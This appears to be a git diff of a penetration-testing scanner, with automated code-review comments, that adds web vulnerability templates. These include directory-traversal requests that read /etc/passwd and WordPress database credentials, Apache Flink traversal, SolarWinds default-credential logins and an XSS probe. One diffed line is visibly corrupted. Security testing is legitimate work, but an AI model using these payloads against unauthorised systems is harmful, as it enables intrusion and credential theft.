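Review bot: In the re-indented arachni block, `cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/` is followed by `unzip arachni.zip` with no check that the `cd` succeeded, so if arachni never created the report directory the unzip runs from whatever the current directory happens to be; `cd "$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/" && unzip arachni.zip` limits the damage. The sc0pe template loop iterates over backtick-captured `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh` output, which word-splits paths; `for file in "$INSTALL_DIR"/templates/passive/web/recursive/*.sh; do [[ -e "$file" ]] || continue; source "$file"; done` does the same without parsing ls. The hunk also keeps the trailing `exit` inside the block, which terminates the whole sniper process rather than just this sourced mode file — a one-line comment saying that is intended would help the next reader. The enclosing `if [[ "$MODE" = "webporthttp" ]]` block starts outside the hunk.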
@@ -228,9 +228,10 @@ if [[ "$MODE" = "webporthttps" ]]; then fi fi if [[ "$INJECTX" == "1" ]]; then - rm -f $LOOT_DIR/web/injectx-$TARGET-https.txt 2> /dev/null + rm -f $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null #cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt - for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt; done; done; + for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt; done; done; + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt fi source $INSTALL_DIR/modes/static-grep-search.sh if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then 
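Review bot: The rewritten inner loop writes injectx output to `injectx-$TARGET-https-${PORT}.txt`, but the new `sed` on the next line reads `injectx-$TARGET-https-${PORT}.raw` — which the preceding `rm -f` just deleted — and redirects into that same `.txt`, so the collected results are truncated to an empty file at the end of the block. The tee target should be the raw file: `injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw; done; done;`. The http variant of this hunk in webporthttp.sh gets this right. The enclosing `if [[ "$MODE" = "webporthttps" ]]` block starts and ends outside the hunk.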
@@ -288,20 +289,20 @@ if [[ "$MODE" = "webporthttps" ]]; then if [[ "$GOBUSTER" == "1" ]]; then sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null fi - wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null + wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-https.txt 2> /dev/null if [[ "$CLUSTERD" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - clusterd --sVl -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt + clusterd --sVl -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt fi if [[ "$CMSMAP" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING CMSMAP $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - cmsmap https://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt + cmsmap https://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt echo "" - cmsmap https://$TARGET:$PORT/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt + cmsmap https://$TARGET:${PORT}/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt echo "" fi if [[ "$WPSCAN" == "1" ]]; then 
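Review bot: The cmsmap and clusterd lines in this https mode file write to `cmsmap-$TARGET-http-port${PORT}a.txt`, `cmsmap-$TARGET-http-port${PORT}b.txt` and `clusterd-$TARGET-port${PORT}.txt`, while the wpscan lines of the same file use `-https-port${PORT}`; if a port is ever scanned in both webporthttp and webporthttps modes the http results are overwritten. Renaming to `cmsmap-$TARGET-https-port${PORT}a.txt` and `cmsmap-$TARGET-https-port${PORT}b.txt` keeps the outputs distinguishable. The enclosing `if [[ "$MODE" = "webporthttps" ]]` block starts and ends outside the hunk.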
@@ -309,53 +310,53 @@ if [[ "$MODE" = "webporthttps" ]]; then echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" if [[ "$WP_API_KEY" ]]; then - wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.raw + wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw echo "" - wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.raw + wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw echo "" else - wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.raw + wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw echo "" - wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.raw + wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw fi - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTa.txt - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port$PORTb.txt + sed -r 
"s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.txt rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null fi if [[ "$NIKTO" == "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt - sed -ir "s/ $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null - rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null + python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null + rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null cd $INSTALL_DIR fi if [[ "$SMUGGLER" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt + python3 
/usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt fi if [[ "$NUCLEI" = "1" ]]; then echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" echo -e "$OKRED RUNNING NUCLEI SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" - nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET:$PORT -o $LOOT_DIR/web/nuclei-https-${TARGET}-port${PORT}.txt + nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-https-${TARGET}-port${PORT}.txt fi cd $INSTALL_DIR SSL="true" diff --git a/modes/webscan.sh b/modes/webscan.sh index ad01291a..6755ae1b 100644 --- a/modes/webscan.sh +++ b/modes/webscan.sh 
@@ -126,6 +126,13 @@ if [[ "$MODE" = "webscan" ]]; then
 unzip arachni.zip
 cd $INSTALL_DIR
 fi
+ if [[ "$NUCLEI" = "1" ]]; then
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+ echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+ nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET -o $LOOT_DIR/web/nuclei-http-${TARGET}-port80.txt
+ nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET -o $LOOT_DIR/web/nuclei-https-${TARGET}-port443.txt
+ fi
 if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
 echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
 echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
diff --git a/sniper b/sniper
index c3ba478a..8942f9aa 100755
--- a/sniper
+++ b/sniper
@@ -8,7 +8,7 @@ if [[ $EUID -ne 0 ]]; then
 exit 1
 fi
-VER="8.9"
+VER="9.0"
 INSTALL_DIR="/usr/share/sniper"
 LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
 SNIPER_PRO=$INSTALL_DIR/pro.sh
diff --git a/sniper.conf b/sniper.conf
index ee8df4fd..66234a0b 100644
--- a/sniper.conf
+++ b/sniper.conf
@@ -12,7 +12,7 @@ REGEX='^[0-9]+$'
 # DEFAULT SETTINGS
 AUTO_BRUTE="0"
-AUTO_VULNSCAN="0"
+VULNSCAN="0"
 FULLNMAPSCAN="0"
 OSINT="0"
 ENABLE_AUTO_UPDATES="1"
diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh
new file mode 100644
index 00000000..d059b24e
--- /dev/null
+++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh
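Review bot: Both nuclei invocations in the new `NUCLEI` block expand `$TARGET`, `$THREADS` and `$LOOT_DIR` unquoted, so a target value containing whitespace or shell-special characters splits into extra arguments or changes where the output lands; quote each expansion, e.g. `-c "$THREADS" -target "http://$TARGET" -o "$LOOT_DIR/web/nuclei-http-${TARGET}-port80.txt"`. The HTTPS run is also unconditional and its output is hard-named `port443`, whereas the normal_webporthttp.sh hunk above derives the same filename from `${PORT}`; if webscan mode has already learned which web ports answer, gating each run on that would avoid a full template pass against a closed service. The enclosing `if [[ "$MODE" = "webscan" ]]` block starts and ends outside this hunk.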
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal'
+URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+METHOD='GET'
+MATCH="root\:x"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh
new file mode 100644
index 00000000..04dd5483
--- /dev/null
+++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2'
+URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+METHOD='GET'
+MATCH="root\:x"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh
new file mode 100644
index 00000000..6ee2ba14
--- /dev/null
+++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3'
+URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
+METHOD='GET'
+MATCH="DB_NAME|DB_USER|COLLATE"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
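Review bot: Variants 3 and 4 of this template (`_3` here, `_4` on the next line) match on `DB_NAME|DB_USER|COLLATE`, so a hit is only produced once the target's `wp-config.php` — its database credentials — has been fetched; presumably the scanner keeps that response body under the loot directory, in which case the output of these two checks needs to be treated as secret material (restrictive permissions, redaction before it reaches a report) rather than as ordinary scan output. `MATCH="root\:x"` escapes a colon that needs no escaping in an ERE, and recent GNU grep (3.8+) warns about such stray backslashes; `MATCH="root:x:"` is cleaner and a little stricter. Every new template in this commit, starting with the three here, ends with `\ No newline at end of file`; terminate the final `GREP_OPTIONS='-i'` line with a newline so editors and `shfmt` stop flagging it.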
diff --git a/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh
new file mode 100644
index 00000000..ba60b14d
--- /dev/null
+++ b/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4'
+URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
+METHOD='GET'
+MATCH="DB_NAME|DB_USER|COLLATE"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh b/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh
new file mode 100644
index 00000000..6f714974
--- /dev/null
+++ b/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal'
+URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd"
+METHOD='GET'
+MATCH="root:*:"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh
new file mode 100644
index 00000000..53a660fc
--- /dev/null
+++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected'
+URI='/remote/login?lang=en'
+METHOD='GET'
+MATCH="launchFortiClient"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
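Review bot: `MATCH="root:*:"` in the Apache Flink template reads like a shell glob, but the scanner hands it to grep as an ERE, where `:*` means zero or more colons, so the pattern collapses to `root:` and will also fire on any page that merely prints the word `root:` (an error message, a help page). The sibling CVE-2020-11738 templates on the previous line use `root\:x` for the same purpose; settling on one form for all passwd-style matches, for instance `root:x:`, keeps the checks consistent and slightly stricter than either current spelling.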
diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh
new file mode 100644
index 00000000..6cc334d1
--- /dev/null
+++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 1'
+URI='/remote/login?lang=en'
+METHOD='GET'
+MATCH="launchFortiClient"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh
new file mode 100644
index 00000000..0a9efb6f
--- /dev/null
+++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 2'
+URI=':10443/remote/login?lang=en'
+METHOD='GET'
+MATCH="launchFortiClient"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh
new file mode 100644
index 00000000..5f6430f7
--- /dev/null
+++ b/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 3'
+URI=':4443/remote/login?lang=en'
+METHOD='GET'
+MATCH="launchFortiClient"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/RabbitMQ_Management_Interface_Detected.sh b/templates/active/RabbitMQ_Management_Interface_Detected.sh
new file mode 100644
index 00000000..63558df5
--- /dev/null
+++ b/templates/active/RabbitMQ_Management_Interface_Detected.sh
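Review bot: `Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh` is functionally identical to `Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh` on the previous line — same `URI='/remote/login?lang=en'`, same `MATCH="launchFortiClient"`, same severity — so every detected panel will be reported twice under two names. Either drop the `_1` file or give it a distinct port prefix the way `_2` (`:10443`) and `_3` (`:4443`) do. `MATCH="launchFortiClient"` is an unanchored, case-insensitive body-string match, which is acceptable for a P5 fingerprint but will also hit any page that simply mentions the FortiClient launcher; a comment naming what the string is expected to come from would help whoever tunes it later.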
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='RabbitMQ Management Interface Detected'
+URI='/'
+METHOD='GET'
+MATCH="RabbitMQ Management"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/SolarWinds_Orion_Default_Credentials_1.sh b/templates/active/SolarWinds_Orion_Default_Credentials_1.sh
index cf194232..d38d28e1 100644
--- a/templates/active/SolarWinds_Orion_Default_Credentials_1.sh
+++ b/templates/active/SolarWinds_Orion_Default_Credentials_1.sh
@@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
 VULN_NAME='SolarWinds Orion Default Credentials 1'
 URI='/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS'
 METHOD='GET'
-MATCH="totalRow|Orion|Poller"
+MATCH="totalRow"
 SEVERITY='P2 - HIGH'
 CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' "
 SECONDARY_COMMANDS=''
diff --git a/templates/active/SolarWinds_Orion_Default_Credentials_2.sh b/templates/active/SolarWinds_Orion_Default_Credentials_2.sh
index 5c5ce101..823f7503 100644
--- a/templates/active/SolarWinds_Orion_Default_Credentials_2.sh
+++ b/templates/active/SolarWinds_Orion_Default_Credentials_2.sh
@@ -2,7 +2,7 @@ AUTHOR='@xer0dayz'
 VULN_NAME='SolarWinds Orion Default Credentials 2'
 URI=':17778/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROW'
 METHOD='GET'
-MATCH="totalRow|Orion|Poller"
+MATCH="totalRow"
 SEVERITY='P2 - HIGH'
 CURL_OPTS="--user-agent '' -s -L --insecure -H 'Authorization: Basic YWRtaW46' -H 'Content-Type: application/json' "
 SECONDARY_COMMANDS=''
diff --git a/templates/active/XSS.py b/templates/active/XSS.py
new file mode 100644
index 00000000..5cd535ce
--- /dev/null
+++ b/templates/active/XSS.py
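Review bot: `URI='/'` with `MATCH="RabbitMQ Management"` only detects the console when it happens to be served on the port the scanner is already probing, whereas the management plugin listens on its own port (15672 by default); following the convention the FortiGate templates use (`URI=':10443/remote/login?lang=en'`), a companion variant with `URI=':15672/'` is probably needed for this check to fire in practice. The file also lacks a trailing newline.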
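Review bot: Narrowing `MATCH` to `totalRow` still runs under `GREP_OPTIONS='-i'`, and the request's own query string contains `TOTALROWS` (template 1) / `TOTALROW` (template 2), so any error page that reflects the requested URL — a 401 or 404 body that quotes the path, say — still satisfies the match and reports default credentials that were never accepted. Matching a token that cannot appear in the URI, such as the quoted JSON key the service returns on success (something like `MATCH='"totalRows"'` — confirm the exact key against a real response), closes that false positive without loosening the check. The two templates also disagree on the trailing keyword (`WITH+TOTALROWS` vs `WITH+TOTALROW`), which looks unintentional; the same note applies to `SolarWinds_Orion_Default_Credentials_2.sh` in this line.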
@@ -0,0 +1,14 @@
+# Import any WebDriver class that you would usually import from
+# selenium.webdriver from the seleniumrequests module
+import sys
+from seleniumrequests import Firefox
+
+url = sys.argv[1]
+# Simple usage with built-in WebDrivers:
+webdriver = Firefox()
+response = webdriver.request('GET', '%s/xss.php?xss=<script>document.write(INJECTX)</script>' % url)
+if '<script>document.write(INJECTX)</script>' in response.text:
+ print("Vulnerable!")
+print(response.text)
+webdriver.quit()
+SECONDARY_COMMANDS=''
diff --git a/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh b/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh
new file mode 100644
index 00000000..af558365
--- /dev/null
+++ b/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh
@@ -0,0 +1,8 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Fortinet FortiGate SSL VPN Panel Passive Detection'
+FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
+MATCH="Server\:\ xxxxxxxx-xxxxx"
+SEVERITY='P5 - INFO'
+GREP_OPTIONS='-i'
+SEARCH='positive'
+SECONDARY_COMMANDS=''
\ No newline at end of file
diff --git a/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh
new file mode 100644
index 00000000..a232bfee
--- /dev/null
+++ b/templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh
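Review bot: `webdriver.quit()` is only reached on the happy path, so every run in which `webdriver.request(...)` raises (connection refused, TLS error, timeout) leaks a Firefox process; put the request and the prints in a `try:` block with `finally: webdriver.quit()`. `url = sys.argv[1]` has no argument check and will die with an IndexError rather than a usage message, and the file hard-codes the `/xss.php?xss=` endpoint, so it can only ever report on that one test page — worth a header comment saying so if that is intended. The trailing `SECONDARY_COMMANDS=''` is a shell template field pasted into a Python file; it parses as a harmless assignment but reads as leftover scaffolding, and `seleniumrequests` is a third-party package that nothing visible in this commit declares or installs.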
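Review bot: `MATCH="Server\:\ xxxxxxxx-xxxxx"` looks like an unfilled placeholder even though FortiOS really does send that literal `Server:` header value, so the next maintainer is likely to "fix" it; a comment directly above it such as `# FortiOS answers with the literal header "Server: xxxxxxxx-xxxxx"; this is not a placeholder` would prevent that. The `\:` and `\ ` escapes are kept verbatim inside double quotes and reach grep as stray backslashes, which recent GNU grep (3.8+) warns about; `MATCH="Server: xxxxxxxx-xxxxx"` is equivalent and clean.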
@@ -0,0 +1,19 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Nuclei Vulnerability Scan - HTTP'
+FILENAME="$LOOT_DIR/web/nuclei-http-$TARGET-port*.txt"
+OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
+GREP_OPTIONS='-ih'
+
+rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[critical\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[high\]"
+egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $4 ", " $1}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null
+MATCH="\[medium\]"
